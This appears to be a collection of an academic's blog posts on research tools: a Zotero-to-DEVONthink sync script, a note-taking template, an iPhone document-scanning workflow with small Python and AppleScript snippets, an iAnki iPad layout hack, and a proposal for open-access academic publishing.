I recently shifted my note-taking to a knowledge database called DEVONthink and, as I recently discussed here, I created a special template script that adds an individual note file (like a note card in the old days) for each fragment or note I take on a source and keeps them in a folder with, and linked to, a main overview note file for the source. Each fragment created duplicates the tags of the main note file.

Automating a Zotero to DEVONthink Workflow with Applescript

I thought it would be nice to automate, with a script, the creation of a folder and a main note file in DEVONthink for each and every source in my Zotero database. I also thought it would be nice if the script brought over any and all tags a source had in Zotero, including tags for whatever collections the source was found in. Finally, I wanted the script to create folders and note files only for those sources I did not already have a folder for in DEVONthink, so that I can run the script every once in a while to keep things synced with Zotero without too much difficulty.

I created such a script this evening, and it can be downloaded here:

Zotero to DEVONthink (Version 1.6 2010.10.16)

To use it:

1. Download and unzip the script

2. Open it in the AppleScript Editor and edit the two configuration variables (the name of the group you want to put all the source folders and note files in, and the location of your Zotero database)

3. Put a copy of the saved script into your DEVONthink scripts folder and run it whenever you want to import all your Zotero entries or, thereafter, check whether there are new sources to be added.

4. Please read my notes in the script for more details on how it works and some things to keep in mind.

Note to developers who can do better:

My script accomplishes its task by using sqlite3 shell commands to directly query the Zotero database. While this is read-only and seems to work fine, it is not the most graceful way of going about things.
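For anyone who wants to poke at the database the same way, here is a minimal read-only sketch in Python (the path is an assumption, so point it at the zotero.sqlite in your own profile, and note that table names vary across Zotero versions):

import sqlite3

# Open the Zotero database read-only so nothing can be changed by accident
conn = sqlite3.connect("file:/path/to/zotero.sqlite?mode=ro", uri=True)
for (name,) in conn.execute("SELECT name FROM sqlite_master WHERE type='table'"):
    print(name)   # lists the tables available to query
conn.close()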

Zotero has an open API, and a developer less of an amateur than I am could probably find an effective way of using AppleScript, perhaps in combination with something like a Firefox plugin, to talk to this API directly in Firefox and get information out of the database that way, which is the approach recommended by the Zotero team. Read more here, here, and here.

Here are some other possible improvements that could be made to this script, or to some combination of it and a Firefox plugin, if someone has the time to work on them. I unfortunately don't have time to work on any of these; please let me know if you add such features, and I'll post updates to the script:

1. If a Zotero entry has any attachments, such as PDFs of the sources or snapshots of web pages, the script could be improved to import these along with the entry.

2. It would be great if a formatted bibliographic entry for the source were added to the main note file created in DEVONthink. Currently this must be done by hand by dragging and dropping the citation into the note file.

3. Any notes already in the Zotero entry for a source should be added to the main note file created in DEVONthink.

4. Ideally, the script would recreate the collections structure found in Zotero within DEVONthink.

5. Ideally, the script would check to see if any tags have been added or deleted from Zotero and not only add tags on the first import of the source.

6. Ideally, the script would keep track of the itemID for each entry and use that to judge whether an entry has already been imported into DEVONthink. That way the user could shorten or edit folder titles etc. in DEVONthink without the script re-importing the entry because it doesn't find an exact match by title.

7. Ideally, the script, or a script and a plugin, would somehow eliminate the need to be run manually: every time I added a new source to Zotero, DEVONthink would automatically be updated.

UPDATE 1.1

-I got rid of a "display dialog" command left over from my last-minute debugging.
-I added a check to see whether Firefox is running, which gives the user the opportunity to quit Firefox; otherwise the script cannot run, since the Zotero database is locked.

UPDATE 1.5

-The script now puts all the sources in a sub-group "_All" (with an option to change the name) and then recreates the collection group hierarchy you had in Zotero. (Note: if you move or change the hierarchy of folders in Zotero and run the script again later, it will not delete the old groups or move them)

-I added a few more configuration options: an option to control whether you are warned that Firefox will be quit, and an option to add the author's name to the name of the group/note file created

-Firefox is automatically restarted at the end of the script

UPDATE 1.6

-The script now supports logging. Every new group and file created will log an entry in a log file. This can be turned off and the location of the log file can be customized in the configuration section of the script.

UPDATE:

There are some problems with the way it handles unusual book titles, and although the script works fine for me, I have seen some comments saying others are having trouble. Please post your comments on the script in the DEVONthink thread for the script, where I hope we can get some help from more skilled scripters who might have time to work on this further:

DEVONthink and Zotero – DEVONthink Forum

Revisiting the Note Taking Problem with DEVONthink

Though I continue to enjoy using the excellent software Scrivener to compose my dissertation, I am still unhappy with my note-taking strategies and with how I collect and organize this information digitally. After writing several postings on what I wish existed in terms of a software solution for doing research for a book or dissertation (1,2,3) and writing a little script to help improve the imperfect solution I have been using, I still find myself frustrated.

To summarize once more what I wish I had in terms of a knowledge database:

As I make a note on a source, e.g. recording a single fact, fragment of information, observation, or summary of an idea from a work, I want that piece of information to be taggable so that it can easily be found in the future when searching for that tag. I want to be able to add and tag many such notes quickly and efficiently, some of which sit "under" others in a hierarchical order and inherit the tags of their parent notes, saving me a lot of repetitive tagging. Every single fragment or note must also contain some link, tag, or metadata indicating the source it came from (a book, article, archival document, interview, etc.) so that when I use that note in my dissertation or book, I can easily find the source it came from.1
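To make the inheritance idea concrete, here is a toy sketch (the class and its names are invented for illustration, not any existing application's API): a note's effective tags are its own plus everything inherited from its ancestors.

class Note:
    def __init__(self, text, source, tags, parent=None):
        self.text = text
        self.source = source      # the work this fragment came from
        self.tags = set(tags)
        self.parent = parent      # the note this one sits "under"

    def effective_tags(self):
        # own tags plus tags inherited from all ancestor notes
        inherited = self.parent.effective_tags() if self.parent else set()
        return self.tags | inherited

overview = Note("overview of the source", "Some Book", {"colonialism", "police"})
fragment = Note("a single fact from chapter 2", "Some Book", {"taxation"}, parent=overview)
print(fragment.effective_tags())   # {'colonialism', 'police', 'taxation'}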

DEVONthink Pro

I am in the process of shifting my note-taking to a powerful knowledge database program called DEVONthink Pro. I was impressed by how quickly and easily I could import all of my nearly one thousand OmniOutliner documents, which I can now preview, search, tag, and group within DEVONthink. But I don't just want to reproduce my existing source-based note structure; I want to experiment with using this application to get just a little closer to my dream knowledge database described above. How am I doing this?

In DEVONthink, I create a group (which is what DEVONthink calls folders) for Sources.

Add a Group for a New Source – Each time I take notes on a new source (a book, movie, archival document, etc.), I create a group for it within this Sources group, with the title of the source.

Create and Tag an Overview Document for the Source – In this newly created group, I create a new text document with the name of the source, in which I give some general information about that source (an overall description or summary) and some general tags that represent the whole source well.

Because DEVONthink also attaches a gray-colored pseudo-tag, named after the group, to every member of a group, any notes that go into this source group will carry a pseudo-tag indicating what source they are from.

Add Notes Using a Customized Template Script – After creating and tagging the overview document, every time I want to add a note from this source, I select the overview document and invoke a keyboard shortcut connected to a DEVONthink template I call "Note On Source" (I'm using Ctrl-Cmd-M). This runs a hacked version of an existing template that comes with DEVONthink called "Annotation," written by Eric Böhnisch-Volkmann and modified by Christian Grunenberg. In its modified form, the new template script does the following:

a. A new note is created in the source’s group
b. The new note gets a link, created by the template script, which points back to the overview document for the source (assuming it was selected when invoking the script).
c. The new note is then automatically tagged with whatever tags the overview document contained. I can then, of course, add further tags or delete any that may not be relevant to this particular fragment or note.

So what does this method accomplish?

Well, using this method, all my fragments, quotes, and notes from a particular source sit together in their own folder, a typical default way of organizing one's notes. But every single note can also be found by searching for a particular combination of tags using DEVONthink's various methods for looking up tagged items. Alternatively, one can create "Smart Groups" that collect notes with certain tags. Every note contains a link back to its source, both through a direct link in the document and through the pseudo-tag attached to the originating group. In short, one can find all notes related to certain tags without losing their source (or needing to enter it manually in each note), as well as all notes related to a particular source. The default tagging of new notes on a source saves me a lot of typing, and I can just add any more specific tags relevant to a given note.

Remaining Issues

Although I’m really impressed with the new 2.x version of the application, there are still a few things I find less than ideal about working in DEVONthink, some of which are no fault of the designers but simply result from the developers having had different goals in mind when they created the application.

1. Unlike Yojimbo or Evernote, DEVONthink supports hierarchical groups/folders. This is wonderful, and makes a lot of things possible. However, when selected, a parent group does not list the contents of its child groups. Thus, if I have a group called “Sources” and a sub-group called “Movies,” inside of which I have files or groups related to individual movies, clicking on Sources reveals only an empty folder/group in the standard three-pane view (or, in icon view, a list of the folders in it) instead of all files under it in the hierarchy. Of course, the Finder and other applications often work the same way, but it would be fantastic if there were an option to “Go Deep,” as one can when viewing folder contents in an application like Leap.

2. Although someone could further modify the script I hacked to make this work, the system as I have it now does not permit cascading notes: all notes are children of the original source, and there are no child notes of notes on a source. Thus the benefit of the kind of hierarchy of bullet points one is used to seeing in a note file is lost.

3. Because what were originally fragments arranged as hierarchical bullet points within a single document (in a note-taking app like OmniOutliner) are now individual files in a hierarchy of folders, much of the power of viewing the contents of these various fragments together at once is lost. DEVONthink lists all notes as files with single-line names. Ideally, my dream note-taking software wouldn’t even need names for the fragments (my hacked version of the script just names them with the date plus the name of the source) and would simply display the contents of notes directly, so they can be seen juxtaposed with whatever other notes are in the list.

Downloading and Using the “Note on Source” Template

Again, I didn’t write this from scratch, but modified an existing template that comes with DEVONthink Pro. To use it, follow the instructions above. To install it:

1. Download the Script: Note on Source
2. Unzip the script and double click on the _Note on Source___Cmd-Ctrl-M.templatescriptd file inside. DEVONthink Pro will ask you whether you want to import or install the template. Choose “Install,” and it should now be active with the Cmd-Ctrl-M shortcut or directly in the menu at Data->New from Template->Note on Source.

  1. My more ambitious and detailed description of this (including the idea of a “smart outline” which would then become possible) can be found in summary form in this posting.

Using an iPhone 3GS to Scan Documents and Create PDFs

During my field research in Korea, Taiwan, and China I carried around a hefty camera with me to archives and libraries. On those fortunate occasions when I was allowed to use it, I snapped nice high-contrast “text mode” photos of everything from handwritten documents and mimeographed newspapers to pages of books, along with thousands of pictures of microfilm reader screens zoomed in on a particular item. I also developed my own coding system connecting the image numbers in the digital camera to items in my notes, in order to easily find the images again when I need them in my dissertation.

On other occasions I carried a smaller camera in my backpack for emergencies, when I wanted to copy some pages out of books, but the pictures were often blurry. I recently discovered, however, that my iPhone 3GS has a good enough camera to take decent pictures of books and documents if you have moderate indoor lighting.

The Pics Need Processing

To get optimal results, however, pictures of books and documents taken with an iPhone 3GS need to be processed: the contrast and brightness need to be turned way up, the image can be significantly reduced in size (from about 1.1MB to about 0.25MB each), and if you are copying an article or part of a book, you ideally want the result to be a PDF, not a folder full of pictures. Indeed, it is for this purpose that I have logged dozens of hours standing in front of the various PDF scanners in the libraries here at Harvard, which I wrote about here.
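
For anyone who wants to script these adjustments rather than do them by hand, here is roughly what the per-image processing looks like in Python with the Pillow imaging library (my own sketch; the exact enhancement factors are guesses you would tune to your photos):

from PIL import Image, ImageEnhance, ImageOps

def prep_page(in_path, out_path):
    """Grayscale, boost contrast and brightness, shrink, compress."""
    img = Image.open(in_path)
    img = ImageOps.grayscale(img)                        # color -> grayscale
    img = ImageEnhance.Contrast(img).enhance(2.0)        # contrast way up
    img = ImageEnhance.Brightness(img).enhance(1.3)      # brightness up
    img = img.resize((img.width // 2, img.height // 2))  # cut the dimensions
    img.save(out_path, "JPEG", quality=40)               # heavy compression

prep_page("IMG_0042.JPG", "page_0042.jpg")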

Processing these pictures by hand is time-consuming and begs for a hack. iPhone applications like JotNot and PocketScan are a nice idea, but I find them incredibly slow and awkward to use.

So I spent a few hours last night and came up with an inelegant but effective solution that, once set up, makes the whole process of getting iPhone pictures processed and into a readable PDF fast and painless. A real hacker would write a script that does all this in a single step, and I would love to get my hands on one, but in the meantime, in case someone out there finds this useful, here is my current solution using OS X 10.6 and Adobe Photoshop CS3.

Preparations

You only need to do these steps once to get your computer set up, but they are kind of convoluted. I’m sure someone out there has a more efficient method:

1. Create a folder somewhere easy to get to on your hard drive and call it “Convert”

2. Create a folder (in the same folder as Convert for example) and call it “Converted”

3. Open “Automator” in your Applications folder and create a new Automator workflow that looks like this:

[Screenshot: the Automator folder-action workflow]

Save this as a workflow that can be attached to the “Convert” folder as a folder action. In the top pop-up menu select “Other…” and choose the “Convert” folder, which will hold the iPhone photos you drop in to be converted into a PDF. The AppleScript step commands Photoshop to run an action I have called “CreatePDF,” which processes the images one at a time (see below). The Automator workflow then grabs all the files, which Photoshop will have saved into a folder called “Converted” (which you should point it at), and creates a PDF from them. The final step cleans up by deleting the images in the Convert and Converted folders. You can remove this step if you don’t want the images deleted, but I usually drop in copies or exported images, so I don’t need them once the PDF has been created. If you like, you can download my Automator application version of this workflow here, modify it for your own use and folder locations, and save it as a workflow. Keep in mind that you need to change the paths in the “rm” commands to point to your own Convert and Converted folders. (For a scripted alternative to this whole pipeline, see the sketch at the end of these preparations.)

4. Now open Photoshop in order to create two actions. You can see what my actions look like below and create your own version, or download mine here, import them into Photoshop, and modify them for your own needs. In the picture below you can see that I have one action called PrepPDF, which actually processes a single image by a) changing it from color to grayscale, b) increasing the brightness and contrast, c) reducing the size of the image, and d) saving the image as a significantly compressed JPEG. You may find that you want to process it in some different way. The second action, CreatePDF, runs Photoshop’s batch command, performing the PrepPDF action on every image it finds in the Convert folder and saving the resulting processed images in the Converted folder.

[Screenshot: the PrepPDF and CreatePDF actions in Photoshop]

5. Finally, in the Finder, right click on the “Convert” folder and choose “Folder Actions Setup…” and attach the workflow you created in Automator.

Now things are set up, and you will be able to convert your pictures to PDF whenever you like using the steps below, without repeating the setup above.

If things don’t work at first, make sure everything is pointing to the right locations: the correct folders, and the correct names for the Photoshop actions and the action set they are saved in.
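
If you would rather skip Automator and Photoshop entirely, the whole Convert-to-PDF pipeline can also be approximated in a single Python script using Pillow, which can write a multi-page PDF directly (again just a sketch, with my own assumptions about folder names and settings):

from pathlib import Path
from PIL import Image, ImageEnhance, ImageOps

CONVERT = Path("Convert")    # drop the iPhone photos here
OUT_PDF = Path("scan.pdf")   # the finished, readable PDF

def prep(img):
    """The PrepPDF-style step: grayscale, boost, shrink."""
    img = ImageOps.grayscale(img)
    img = ImageEnhance.Contrast(img).enhance(2.0)
    img = ImageEnhance.Brightness(img).enhance(1.3)
    return img.resize((img.width // 2, img.height // 2))

pages = [prep(Image.open(p)) for p in sorted(CONVERT.glob("*.JPG"))]
if pages:
    # save_all appends the remaining pages after the first one
    pages[0].save(OUT_PDF, "PDF", save_all=True, append_images=pages[1:])
    for p in CONVERT.glob("*.JPG"):
        p.unlink()           # the cleanup step, like the rm commands above

You could run this by hand after copying the photos over, or attach it to a folder action just as with the Automator version.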

Going from iPhone Pictures to Readable PDF

1. Take pictures of the document or book in decent lighting. Tap on the screen to focus if it is not focusing properly. It would be nice to put together a copy stand to hold the iPhone up while you take pictures, but I’m not that kind of hacker.

2. Import the pictures of the documents/books from your iPhone into iPhoto or, via Image Capture, somewhere on your computer. I don’t recommend importing the pictures from the iPhone directly into the “Convert” folder, as the copying process is slow and the script seems to race ahead of the copying, ending up with incomplete PDFs.

3. Open Photoshop. The script should launch it, but I find it works better when it is already open.

4. With Photoshop open, drag and drop your images (or a copy of them, made by holding down the Option key) into the “Convert” folder. This triggers the Automator workflow, which runs the Photoshop action CreatePDF, which in turn runs PrepPDF on each picture found in the Convert folder and dumps the processed images into the Converted folder. When that is done, the Automator workflow takes the processed images from the Converted folder, creates a PDF out of them, and deletes the images in both folders so everything is clean and ready for the next job. The PDF ends up on the Desktop (this old Automator action seems to be broken in Snow Leopard, and I can’t get it to save the PDF anywhere else).

With this I have been able, even while standing in the stacks of my library, to whip out my iPhone, hold the book open, snap pictures of an interesting chapter, and process them quickly and easily into PDFs once I get home. Here is one short example of a PDF created from some pictures taken in the stacks with my iPhone.

Update: If you are converting a lot of pictures into a single PDF, the AppleScript in the first step can time out. I added two lines to my workflow to increase the timeout from the default two minutes to ten minutes:

tell application "Adobe Photoshop CS3"
  -- give the batch action up to ten minutes instead of the default two
  with timeout of 600 seconds
    do action "CreatePDF" from "Default Actions"
  end timeout
end tell

iAnki for iPad Hack

I recently broke down and got an iPad. I use it mostly for reading PDFs on the run, watching movies, taking notes (with an external Bluetooth keyboard), and studying my daily flashcards.

After trying (and writing reviews of) many different flashcard programs over the years, and even designing some of my own many years ago, I have become a loyal daily user of an open source project called Anki (read my review here). It is, in my opinion, the best program around that uses “spaced repetition,” or interval study, to prompt you to review only the information you are on the verge of forgetting. It helps me keep up on vocabulary in various languages and even serves as a kind of daily “meditation of repetitive action” for me.
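
For the curious, the core idea behind spaced repetition is easy to sketch. Anki’s scheduler descends from the SM-2 algorithm, and a toy version of the interval arithmetic (my simplification, not Anki’s actual code) looks like this:

def next_interval(interval_days, ease, grade):
    """Toy SM-2-style step: grade runs from 0 (forgot) to 5 (perfect).
    Returns the next interval in days and the updated ease factor."""
    if grade < 3:
        return 1.0, ease   # lapse: see it again tomorrow
    ease = max(1.3, ease + 0.1 - (5 - grade) * (0.08 + (5 - grade) * 0.02))
    return interval_days * ease, ease

# A card you keep remembering gets pushed further and further into the future.
interval, ease = 1.0, 2.5
for grade in [4, 4, 5]:
    interval, ease = next_interval(interval, ease, grade)
    print(f"see it again in about {interval:.0f} days")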

I can use Anki on my iPhone/iPad through a browser-based script called iAnki, but there were some things about the layout of the iAnki plug-in that I didn’t think worked well on the big screen of the iPad, which is now my primary way of studying vocabulary decks when I’m out of the house.

I made some changes to the HTML in the plug-in that I think work better for me. These include:

1. Increasing the font sizes of several fields.
2. Removing the “Show Answer” button and making most of the screen function as a “Show Answer” button, so you don’t need to reach for a small button.
3. Moving the 1 and 3 buttons to the left edge, where I can easily reach them while holding my iPad.
4. Moving the 2 and 4 buttons to the right edge, where I can easily reach them.

For anyone out there also using iAnki on an iPad who wants to try my hack, here is what to do:

1. Download the hacked template here.

2. Unzip it and use it to replace the existing ianki.html file in the iAnki plugin folder. For example, on my Mac the old ianki.html file is found at:

~/Library/Application Support/Anki/plugins/ianki_ext/templates/ianki.html

Replace that file with the new one you downloaded.

3. Open Anki, launch the iAnki plug-in, and install it on your iPad (you’ll need to install and bookmark it again if you had it installed already).

If you use Anki, please support Damien’s programming efforts in Japan with a donation and congratulate him on his recent marriage.

Tell Me Why This Couldn’t Work

I found lots of interesting book offerings in the Routledge Asian Studies catalog I got in the mail today. Government and Politics in Taiwan is out in paperback; I’d love to learn a bit more about that. Oh, $43 seems a little much for a paperback. Legacies of the Asia-Pacific War looks interesting. Hmm, $125 seems a little unreasonable for a 240-pager, even if it is hardback and all. Ooh, Debating Culture in Interwar China, ah, but this 176-page book is $130. The Third Chinese Revolutionary Civil War, 1945-49 seems right up my alley, but $160 for that 224-page book is out of my range and is probably not where your average library would want to invest. But don’t worry, you can buy a Kindle version of the book for only $127 at Amazon! Hey, a four-volume set on Imperial Japan and the World 1931-1945 looks fantastic and appears to include a collection of influential historical essays on the topic. Oh, these four books will set you back $1295.

It is true that Routledge is worse than many publishers, but this is beyond ridiculous. I’m fortunate enough to have access to Harvard’s libraries until I graduate (fingers crossed) next year, but the chances are very good that whatever libraries I find nearby throughout the rest of my career will be the kind that cringe at these prices. I don’t really blame the publishers, though. They are just trying to make a buck in a tough industry, with books that have very low chances of selling more than a few copies here and there.

However, I do blame academia for making book publishing such a central part of career advancement. I really wish it would support a wider range of formats and a completely digital, open access, but still peer-reviewed world of scholarly interaction, given the increased potential this offers for informed readers outside our small academic world to participate more actively in the process.

Perhaps my expectations are too high, but even if monograph-length publications of the traditional variety are here to stay, can someone tell me why we can’t do something like this:

1. Scholar gets an annual personal publication fund from their department, its size based on multiple variables, including, perhaps, evaluation of past publications or a department’s commitment to supporting research in a tough field that is poorly funded by grants and professional associations.

2. Scholar writes a manuscript (a book or an article, though other multimedia or film projects, etc., ought to be included as well).

3. Scholar submits the manuscript to a professional association, along with a small administration fee, for distribution of the work to its readers (or viewers, etc.).

4. Professional association finds some qualified, unpaid, anonymous readers to evaluate the quality of the work and distributes copies to them (the way publishers do now).

5. Readers return an evaluation that concludes “refuse,” “revise,” or “publish,” with some indication of the relative importance of the work’s contribution to the field from their perspective.

6. If it passes peer review, the professional association gives the scholar the evaluation reports, an official endorsement (which can be used to promote the work once “published”), and, if funding is available, an offer of some amount of money towards publication of the work, in proportion to the importance its readers attributed to it, the association’s own further evaluation, and its budget for the year.

7. If the work passes peer review and the money offered by the professional association is sufficient for publication, proceed to step (9). Otherwise,

8. If the offered money is insufficient to cover publication costs, or the professional association refuses to endorse the work, and the scholar does not wish to make up the difference from her/his personal publication fund, they repeat steps (3) to (6), seeking help from other professional associations (whose evaluations will add to the prestige and funding of the work) or from other funding sources (departmental, university, other institutions), until they receive enough money in offers, or else revise or abandon the research project. (The short sketch after step (13) below models this loop.)

Once the scholar has decided that they have enough support from professional associations, grants, further departmental support, or contributions from their annual personal publication fund, they proceed with publication and spend their funds in the following manner:

9. (Optional) Pay a lump sum to a publisher-consultant who handles the administrative tasks and payments in steps (10) to (13) below, if the scholar doesn’t want to deal with them personally or through someone at their own institution hired specifically for this task. Either way, there is to be no transfer of copyright away from the scholar, and this publisher-consultant has no role in determining whether or not something gets published. In this model the publisher is an administrator with the contacts needed to manage the steps below.

10. Pay for X hours of labor to hire an editor-consultant to help improve the language and writing of the manuscript beyond the quality of its academic content.

11. Pay for Y hours of labor to hire a designer-consultant to create the print and digital presentation for the work (for desktop/mobile web browsers and e-reader applications).

12. Pay $Z in fees to have the metadata for the work permanently indexed and its files hosted in multiple online repositories, including important information on its peer-reviewed endorsements and positive/negative evaluation reports.

13. (If you really want to make a paper version) Submit the print-formatted version of the work to all the major online print-on-demand services, where anyone, libraries and average readers alike, can order a cheap paper copy.
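
Before turning to its strengths, here is the funding loop of steps (3) through (8) reduced to a few lines of Python (purely illustrative; the class, the random verdicts, and the numbers are all my own stand-ins):

from dataclasses import dataclass
import random

@dataclass
class Association:
    typical_offer: float

    def review(self):
        """Steps (4)-(5): anonymous readers return a verdict;
        'publish' comes with an endorsement and a funding offer (6)."""
        verdict = random.choice(["refuse", "revise", "publish"])
        return verdict, self.typical_offer if verdict == "publish" else 0.0

def seek_publication(cost, associations, personal_fund):
    """Steps (3)-(8): gather offers until the cost is covered,
    topping up from the personal publication fund as a last resort."""
    offers = 0.0
    for assoc in associations:
        verdict, offer = assoc.review()
        offers += offer
        if offers >= cost:
            return True   # step (7): fully funded, proceed to step (9)
    # step (8): cover the shortfall personally, or revise/abandon
    return offers + personal_fund >= cost

print(seek_publication(5000.0, [Association(2000.0)] * 3, 1500.0))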

Here are some of the strengths of a system like this:

-It leaves the copyright in the hands of the author, who will hopefully release the text with a Creative Commons license for maximum distribution and use.

-It imagines a new and powerful role for professional associations, or at least a transformation of traditional journal editorial boards/networks into more broadly defined associations that continue to have, among their primary duties, the evaluation of scholarly work in their field.

-It recognizes that publishing, even of digital or print-on-demand works, can be a costly process involving many hours of labor beyond that of the author and the anonymous readers.

-It leaves peer review intact but shifts it from publishers to professional associations, which should proliferate in number, each naturally developing its own perceived standards of quality and its own funding sources. With the decline of traditional academic publishing, these organizations should receive funding from universities and outside grant institutions, or at least provide those funders with recommendations on where their money should go.

-It allows for multiple sources of funding: not only from the professional associations that participate in the peer review process, but also from scholars’ own annual publishing funds and from further grants from universities or other institutions.

-Since personal or departmental funds may end up partly or completely funding the publication of works that were poorly evaluated in the peer-review process and could not attract financial support on the basis of their quality, the system does little to stop bad research from getting published. It does, however, prevent such works from becoming a burden on traditional publishers, who currently pass that cost on to the consumers of information: since publishers now play no part in the selection process and have no stake in a publication’s success, the publisher, editor, designer, and digital index/content hosts are all paid for their work regardless. Also, since poor-quality publications will not be able to promote themselves with the endorsements and positive evaluations of reputable professional associations, they will simply get cited less and can be filtered out in various ways during the search for sources. And even bad works, or ones on extremely obscure topics, can sometimes be useful, if only for a footnote or two that turns us on to a good source.

In this system what is the role for traditional academic publishing companies as they exist now?

None. Universities, which support many of them, should eventually dissolve them, but support them long enough to allow a relatively smooth transition for their employees to find niches in the businesses that should grow up around providing the services in steps (9) to (12). Paper book printing should all be done through print-on-demand services as the print medium slowly declines. Marketing/promotion of the traditional kind will ideally become a minimal part of the equation as association endorsements and evaluations become the dominant stamp of quality and citation networking power comes to rule the day. Of course, you can add a “marketing” budget for promotion and advertising between steps (11) and (12) above if such funds are available, but hopefully this will be seen as a practice resorted to mostly by those who failed to receive strong endorsements from professional associations. No one promotes our journal articles; why should we treat our academic books and other projects differently? If a work gets cited, read, and referenced, is that not enough to ensure its spread, especially if it is openly available and thus offers no barrier to access?

Now, tell me why this can’t work. Why won’t something similar emerge from the ridiculous state of academic publishing today, when it really wakes up? Let me know what you think.